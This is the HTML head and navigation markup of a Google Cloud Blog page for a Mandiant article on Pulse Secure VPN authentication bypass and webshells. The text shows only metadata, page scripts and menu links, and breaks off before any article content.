k=a.m[c]||[];k.push(b);a.m[c]=k}a.o.addEventListener(c,function(h){return function(f){d(b,f,h)}},void 0)}}p.prototype.j=function(a){return this.l[a]};p.prototype.ecrd=function(a){this.i=a;var b;if((b=this.g)==null?0:b.length){for(a=0;a<this.g.length;a++)q(this,this.g[a]);this.g=null}};var t=typeof navigator!=="undefined"&&/iPhone|iPad|iPod/.test(navigator.userAgent);function u(a){this.g=a;this.i=[]}u.prototype.addEventListener=function(a,b,c){t&&(this.g.style.cursor="pointer");var d=this.i,k=d.push,h=this.g;b=b(this.g);var f=!1;m.indexOf(a)>=0&&(f=!0);h.addEventListener(a,b,typeof c==="boolean"?{capture:f,passive:c}:f);k.call(d,{eventType:a,j:b,capture:f,passive:c})};var g="click dblclick focus focusin blur error focusout keydown keyup keypress load mouseover mouseout mouseenter mouseleave submit toggle touchstart touchend touchmove touchcancel auxclick change compositionstart compositionupdate compositionend beforeinput input select textinput copy cut paste mousedown mouseup wheel contextmenu dragover dragenter dragleave drop dragstart dragend pointerdown pointermove pointerup pointercancel pointerenter pointerleave pointerover pointerout gotpointercapture lostpointercapture ended loadedmetadata pagehide pageshow visibilitychange beforematch".split(" "); if(!(g instanceof Array)){var v;var w=typeof Symbol!="undefined"&&Symbol.iterator&&g[Symbol.iterator];if(w)v=w.call(g);else if(typeof g.length=="number")v={next:e()};else throw Error(String(g)+" is not an iterable or ArrayLike");for(var x,y=[];!(x=v.next()).done;)y.push(x.value)};var z=function(a){return{trigger:function(b){var c=a.j(b.type);c||(r(a,b.type),c=a.j(b.type));var d=b.target||b.srcElement;c&&c(b.type,b,d.ownerDocument.documentElement)},configure:function(b){b(a)}}}(function(){var a=window,b=new u(a.document.documentElement),c=new p(b);g.forEach(function(h){return r(c,h)});var d,k;"onwebkitanimationend"in a&&(d="webkitAnimationEnd");r(c,"animationend",d);"onwebkittransitionend"in a&&(k="webkitTransitionEnd");r(c,"transitionend",k);return{s:c,u:b}}().s),A=["BOQ_wizbind"], C=window||l;A[0]in C||typeof C.execScript=="undefined"||C.execScript("var "+A[0]);for(var D;A.length&&(D=A.shift());)A.length||z===void 0?C[D]&&C[D]!==Object.prototype[D]?C=C[D]:C=C[D]={}:C[D]=z;}).call(this); </script><script noCollect src="https://www.gstatic.com/_/mss/boq-cloudx-web-blog/_/js/k=boq-cloudx-web-blog.TransformBlogUi.en_US.gC3IVRdc-js.es5.O/am=OBgwCw/d=1/excm=_b,_tp,articleview/ed=1/dg=0/wt=2/ujg=1/rs=AHrnUqUC0U47L_N8kMcLkQijaVUP_3FZOw/m=_b,_tp" defer id="base-js" fetchpriority="high" nonce="-49Bz_4wsckd3k4vDG-wCQ"></script><script nonce="-49Bz_4wsckd3k4vDG-wCQ">if (window.BOQ_loadedInitialJS) {onJsLoad();} else {document.getElementById('base-js').addEventListener('load', onJsLoad, false);}</script><script nonce="-49Bz_4wsckd3k4vDG-wCQ"> window['_wjdc'] = function (d) {window['_wjdd'] = d}; </script><title>Authentication Bypass Techniques and Pulse Secure Zero-Day | Google Cloud Blog</title><meta name="description" content="We examine multiple techniques for bypassing single &amp; multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells."><meta name="robots" content="max-image-preview:large"><meta property="og:title" content="Authentication Bypass Techniques and Pulse Secure Zero-Day | Google Cloud Blog"><meta property="og:type" content="website"><meta property="og:url" content="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"><meta property="og:image" content="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplif.max-2600x2600.png"><meta property="og:description" content="We examine multiple techniques for bypassing single &amp; multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells."><meta property="og:site_name" content="Google Cloud Blog"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:url" content="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day"><meta name="twitter:title" content="Authentication Bypass Techniques and Pulse Secure Zero-Day | Google Cloud Blog"><meta name="twitter:description" content="We examine multiple techniques for bypassing single &amp; multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells."><meta name="twitter:image" content="https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplif.max-2600x2600.png"><meta name="twitter:site" content="@googlecloud"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","@id":"https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day","headline":"Authentication Bypass Techniques and Pulse Secure Zero-Day","description":"We examine multiple techniques for bypassing single \u0026 multifactor authentication on Pulse Secure VPN devices and maintaining access through webshells.","image":"https://storage.googleapis.com/gweb-cloudblog-publish/images/threat-intelligence-default-banner-simplif.max-2600x2600.png","author":[{"@type":"Person","name":"Mandiant ","url":""}],"datePublished":"2021-04-20","publisher":{"@type":"Organization","name":"Google Cloud","logo":{"@type":"ImageObject","url":"https://www.gstatic.com/devrel-devsite/prod/v8bb8fa0afe9a8c3a776ebeb25d421bb443344d789b3607754dfabea418b8c4be/cloud/images/cloud-logo.svg"}},"url":"https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day","keywords":["Threat Intelligence","Security \u0026 Identity"],"timeRequired":"PT31M"}</script><link rel="canonical" href="https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day/"><meta name="track-metadata-page_post_title" content="Authentication Bypass Techniques and Pulse Secure Zero-Day"><meta name="track-metadata-page_post_labels" content="Threat Intelligence"><meta name="track-metadata-page_first_published" content="2024-03-26 06:03:00"><meta name="track-metadata-page_last_published" content="2021-04-20 11:04:00"><meta name="track-metadata-page_post_author" content="Mandiant "><meta name="track-metadata-page_post_author_role" content=""><header jsaction="rcuQ6b:npT2md" jscontroller="o60eef" class="glue-header nRhiJb-tJHJj-OWXEXe-kFx1Ae" id="kO001e"><a href="./#content" class="glue-header__link glue-header__skip-content">Jump to Content</a><div class="glue-header__bar glue-header__bar--mobile DFb9Jf" track-metadata-module="header"><div class="nRhiJb-mb9u9d"><div class="glue-header__container JF2WI"><div class="nRhiJb-o2XRw-yHKmmc lUwpmd"><div class="nRhiJb-rSCjMe"><a class="nRhiJb-rSCjMe-hSRGPd" href="https://cloud.google.com/" title="Google Cloud" track-name="google cloud"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/"track-metadata-module="header"><div class="nRhiJb-rSCjMe-haAclf"><svg class="glue-header__logo-svg" viewBox="0 0 74 24" role="presentation" aria-hidden="true"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"></path><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3.52 1.74 0 3.1 1.5 3.1 3.54.01 2.03-1.36 3.5-3.1 3.5z"></path><path fill="#FBBC05" d="M38 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#34A853" d="M58 .24h2.51v17.57H58z"></path><path fill="#EA4335" d="M68.26 15.52c-1.3 0-2.22-.59-2.82-1.76l7.77-3.21-.26-.66c-.48-1.3-1.96-3.7-4.97-3.7-2.99 0-5.48 2.35-5.48 5.81 0 3.26 2.46 5.81 5.76 5.81 2.66 0 4.2-1.63 4.84-2.57l-1.98-1.32c-.66.96-1.56 1.6-2.86 1.6zm-.18-7.15c1.03 0 1.91.53 2.2 1.28l-5.25 2.17c0-2.44 1.73-3.45 3.05-3.45z"></path></svg></div><span class="nRhiJb-rSCjMe-OWXEXe-UBMNlb khBwGd">Cloud</span></a></div></div><div class="glue-header__hamburger s6BfRd"><button class="glue-header__drawer-toggle-btn" aria-label="Open the navigation drawer"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"></path></svg></button></div><div class="nRhiJb-o2XRw-yHKmmc UrjqX"><div class="nRhiJb-rSCjMe"><a class="nRhiJb-rSCjMe-hSRGPd" href="https://cloud.google.com/blog" title="Google Cloud Blog" track-name="blog"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog"track-metadata-module="header"><span class="nRhiJb-rSCjMe-OWXEXe-UBMNlb khBwGd">Blog</span></a></div></div></div><div class="glue-header__container ca6rub"><div class="nRhiJb-GUI8l"><a class="nRhiJb-LgbsSe nRhiJb-LgbsSe-OWXEXe-pSzOP-o6Shpd " href="https://cloud.google.com/contact/" track-name="contact sales"track-type="blog nav"track-metadata-eventdetail="cloud.google.com/contact/"track-metadata-module="header" track-name="contact sales"track-type="button"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/contact/">Contact sales </a><a class="nRhiJb-LgbsSe nRhiJb-LgbsSe-OWXEXe-CNusmb-o6Shpd " href="https://console.cloud.google.com/freetrial/" track-name="get started for free"track-type="blog nav"track-metadata-eventdetail="console.cloud.google.com/freetrial/"track-metadata-module="header" track-name="get started for free"track-type="button"track-metadata-position="nav"track-metadata-eventdetail="console.cloud.google.com/freetrial/">Get started for free </a></div><div class="GKI4ub"><div class="Jhiezd"><form action="/blog/search/" class="A2C6Ob"><input class="BAhdXd" jsname="oJAbI" name="query" type="text" placeholder="Find an article..."><input type="hidden" name="language" value=en hidden><input type="hidden" name="category" value=article hidden><input type="hidden" name="paginate" value="25" hidden><input type="hidden" name="order" value="newest" hidden><input type="hidden" name="hl" value=en hidden><span class="A0lwXc" jsname="D8MWrd" aria-label="Show the search input field." role="button" jsaction="click:jUF4E"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c" viewBox="0 0 24 24" role="presentation" aria-hidden="true" width="40" height="22"><path d="M20.49 19l-5.73-5.73C15.53 12.2 16 10.91 16 9.5A6.5 6.5 0 1 0 9.5 16c1.41 0 2.7-.47 3.77-1.24L19 20.49 20.49 19zM5 9.5C5 7.01 7.01 5 9.5 5S14 7.01 14 9.5 11.99 14 9.5 14 5 11.99 5 9.5z"></path></svg></span></form></div></div></div></div></div><div class="glue-header__bar glue-header__bar--desktop glue-header__drawer YcctDe" track-metadata-module="header"><div class="nRhiJb-mb9u9d M7RUq"><div class="glue-header__container JF2WI"><div class="nRhiJb-o2XRw-yHKmmc lUwpmd"><div class="nRhiJb-rSCjMe"><a class="nRhiJb-rSCjMe-hSRGPd" href="https://cloud.google.com/" title="Google Cloud" track-name="google cloud"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/"track-metadata-module="header"><div class="nRhiJb-rSCjMe-haAclf"><svg class="glue-header__logo-svg" viewBox="0 0 74 24" role="presentation" aria-hidden="true"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"></path><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3.52 1.74 0 3.1 1.5 3.1 3.54.01 2.03-1.36 3.5-3.1 3.5z"></path><path fill="#FBBC05" d="M38 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#34A853" d="M58 .24h2.51v17.57H58z"></path><path fill="#EA4335" d="M68.26 15.52c-1.3 0-2.22-.59-2.82-1.76l7.77-3.21-.26-.66c-.48-1.3-1.96-3.7-4.97-3.7-2.99 0-5.48 2.35-5.48 5.81 0 3.26 2.46 5.81 5.76 5.81 2.66 0 4.2-1.63 4.84-2.57l-1.98-1.32c-.66.96-1.56 1.6-2.86 1.6zm-.18-7.15c1.03 0 1.91.53 2.2 1.28l-5.25 2.17c0-2.44 1.73-3.45 3.05-3.45z"></path></svg></div><span class="nRhiJb-rSCjMe-OWXEXe-UBMNlb khBwGd">Cloud</span></a></div></div><div class="nRhiJb-o2XRw-yHKmmc UrjqX"><div class="nRhiJb-rSCjMe"><a class="nRhiJb-rSCjMe-hSRGPd" href="https://cloud.google.com/blog" title="Google Cloud Blog" track-name="blog"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog"track-metadata-module="header"><span class="nRhiJb-rSCjMe-OWXEXe-UBMNlb khBwGd">Blog</span></a></div></div></div><div class="glue-header__container glue-header__stepped-nav LKvi8b" role="navigation"><div class="glue-header__stepped-nav-controls-container"><div class="glue-header__stepped-nav-controls"><div class="glue-header__stepped-nav-controls-arrow"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M16.41 5.41L15 4l-8 8 8 8 1.41-1.41L9.83 12"></path></svg><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G glue-header__stepped-nav-subnav-icon" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg></div><div class="glue-header__stepped-nav-controls-title glue-header__link"></div></div></div><div class="glue-header__stepped-nav-menus"></div></div><div class="glue-header__container nRhiJb-J6KYL-OWXEXe-Q4irje"><nav class="glue-header__link-bar"><ul class="glue-header__list glue-header__list--nested glue-header__deep-nav URiJfb"><li class="glue-header__item "><a class="glue-header__link">Solutions &amp; technology<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg></a><ul class="glue-header__list NDdrcc"><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/ai-machine-learning" track-name="ai &amp; machine learning"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/ai-machine-learning"track-metadata-module="header"><span>AI &amp; Machine Learning</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/api-management" track-name="api management"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/api-management"track-metadata-module="header"><span>API Management</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/application-development" track-name="application development"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/application-development"track-metadata-module="header"><span>Application Development</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/application-modernization" track-name="application modernization"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/application-modernization"track-metadata-module="header"><span>Application Modernization</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/chrome-enterprise" track-name="chrome enterprise"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/chrome-enterprise"track-metadata-module="header"><span>Chrome Enterprise</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/compute" track-name="compute"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/compute"track-metadata-module="header"><span>Compute</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/containers-kubernetes" track-name="containers &amp; kubernetes"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/containers-kubernetes"track-metadata-module="header"><span>Containers &amp; Kubernetes</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/data-analytics" track-name="data analytics"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/data-analytics"track-metadata-module="header"><span>Data Analytics</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/databases" track-name="databases"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/databases"track-metadata-module="header"><span>Databases</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/devops-sre" track-name="devops &amp; sre"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/devops-sre"track-metadata-module="header"><span>DevOps &amp; SRE</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/maps-geospatial" track-name="maps &amp; geospatial"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/maps-geospatial"track-metadata-module="header"><span>Maps &amp; Geospatial</span></a></li><li class="glue-header__item "><a class="glue-header__link janap">Security<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg></a><ul class="glue-header__list NDdrcc"><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/identity-security" track-name="security &amp; identity"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/identity-security"track-metadata-module="header"><span>Security &amp; Identity</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/threat-intelligence" track-name="threat intelligence"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/threat-intelligence"track-metadata-module="header"><span>Threat Intelligence</span></a></li></ul></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/infrastructure" track-name="infrastructure"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/infrastructure"track-metadata-module="header"><span>Infrastructure</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/infrastructure-modernization" track-name="infrastructure modernization"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/infrastructure-modernization"track-metadata-module="header"><span>Infrastructure Modernization</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/networking" track-name="networking"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/networking"track-metadata-module="header"><span>Networking</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/productivity-collaboration" track-name="productivity &amp; collaboration"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/productivity-collaboration"track-metadata-module="header"><span>Productivity &amp; Collaboration</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/sap-google-cloud" track-name="sap on google cloud"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/sap-google-cloud"track-metadata-module="header"><span>SAP on Google Cloud</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/storage-data-transfer" track-name="storage &amp; data transfer"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/storage-data-transfer"track-metadata-module="header"><span>Storage &amp; Data Transfer</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/sustainability" track-name="sustainability"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/sustainability"track-metadata-module="header"><span>Sustainability</span></a></li></ul></li><li class="glue-header__item "><a class="glue-header__link">Ecosystem<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg></a><ul class="glue-header__list NDdrcc"><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/transform" track-name="it leaders"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/transform"track-metadata-module="header"><span>IT Leaders</span></a></li><li class="glue-header__item "><a class="glue-header__link janap">Industries<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg></a><ul class="glue-header__list NDdrcc"><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/financial-services" track-name="financial services"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/financial-services"track-metadata-module="header"><span>Financial Services</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/healthcare-life-sciences" track-name="healthcare &amp; life sciences"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/healthcare-life-sciences"track-metadata-module="header"><span>Healthcare &amp; Life Sciences</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/manufacturing" track-name="manufacturing"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/manufacturing"track-metadata-module="header"><span>Manufacturing</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/products/media-entertainment" track-name="media &amp; entertainment"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/products/media-entertainment"track-metadata-module="header"><span>Media &amp; Entertainment</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/public-sector" track-name="public sector"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/public-sector"track-metadata-module="header"><span>Public Sector</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/retail" track-name="retail"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/retail"track-metadata-module="header"><span>Retail</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/supply-chain-logistics" track-name="supply chain"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/supply-chain-logistics"track-metadata-module="header"><span>Supply Chain</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/telecommunications" track-name="telecommunications"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/telecommunications"track-metadata-module="header"><span>Telecommunications</span></a></li></ul></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/partners" track-name="partners"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/partners"track-metadata-module="header"><span>Partners</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/startups" track-name="startups &amp; smb"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/startups"track-metadata-module="header"><span>Startups &amp; SMB</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/training-certifications" track-name="training &amp; certifications"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/training-certifications"track-metadata-module="header"><span>Training &amp; Certifications</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/inside-google-cloud" track-name="inside google cloud"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/inside-google-cloud"track-metadata-module="header"><span>Inside Google Cloud</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://cloud.google.com/blog/topics/google-cloud-next" track-name="google cloud next &amp; events"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/google-cloud-next"track-metadata-module="header"><span>Google Cloud Next &amp; Events</span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://mapsplatform.google.com/resources/blog/" track-name="google maps platform"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="mapsplatform.google.com/resources/blog/"track-metadata-module="header" target="_blank"><span>Google Maps Platform<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G FsOzib nRhiJb-tHaKme-AipIyc" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="m8.9 16.075 5.4-5.4v2.675h1.4V8.3h-5.05v1.4h2.65l-5.375 5.375ZM12 21.3q-1.925 0-3.625-.738-1.7-.737-2.95-1.987-1.25-1.25-1.987-2.95Q2.7 13.925 2.7 12t.738-3.625q.737-1.7 1.987-2.95 1.25-1.25 2.95-1.988Q10.075 2.7 12 2.7t3.625.737q1.7.738 2.95 1.988 1.25 1.25 1.987 2.95.738 1.7.738 3.625t-.738 3.625q-.737 1.7-1.987 2.95-1.25 1.25-2.95 1.987-1.7.738-3.625.738Z"></path></svg></span></a></li><li class="glue-header__item "><a class="glue-header__link janap " href="https://workspace.google.com/blog" track-name="google workspace"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="workspace.google.com/blog"track-metadata-module="header" target="_blank"><span>Google Workspace<svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-SFi8G FsOzib nRhiJb-tHaKme-AipIyc" viewBox="0 0 24 24" role="presentation" aria-hidden="true"><path d="m8.9 16.075 5.4-5.4v2.675h1.4V8.3h-5.05v1.4h2.65l-5.375 5.375ZM12 21.3q-1.925 0-3.625-.738-1.7-.737-2.95-1.987-1.25-1.25-1.987-2.95Q2.7 13.925 2.7 12t.738-3.625q.737-1.7 1.987-2.95 1.25-1.25 2.95-1.988Q10.075 2.7 12 2.7t3.625.737q1.7.738 2.95 1.988 1.25 1.25 1.987 2.95.738 1.7.738 3.625t-.738 3.625q-.737 1.7-1.987 2.95-1.25 1.25-2.95 1.987-1.7.738-3.625.738Z"></path></svg></span></a></li></ul></li><li class="glue-header__item "><a class="glue-header__link " href="https://cloud.google.com/blog/topics/developers-practitioners" track-name="developers &amp; practitioners"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/blog/topics/developers-practitioners"track-metadata-module="header"><span>Developers &amp; Practitioners</span></a></li><li class="glue-header__item "><a class="glue-header__link " href="https://cloud.google.com/transform" track-name="transform with google cloud"track-type="blog nav"track-metadata-position="nav"track-metadata-eventdetail="cloud.google.com/transform"track-metadata-module="header"><span>Transform with Google Cloud</span></a></li></ul></nav></div><div class="glue-header__container ca6rub nRhiJb-J6KYL-OWXEXe-SU0ZEf"><div class="nRhiJb-GUI8l"><a class="nRhiJb-LgbsSe nRhiJb-LgbsSe-OWXEXe-pSzOP-o6Shpd " 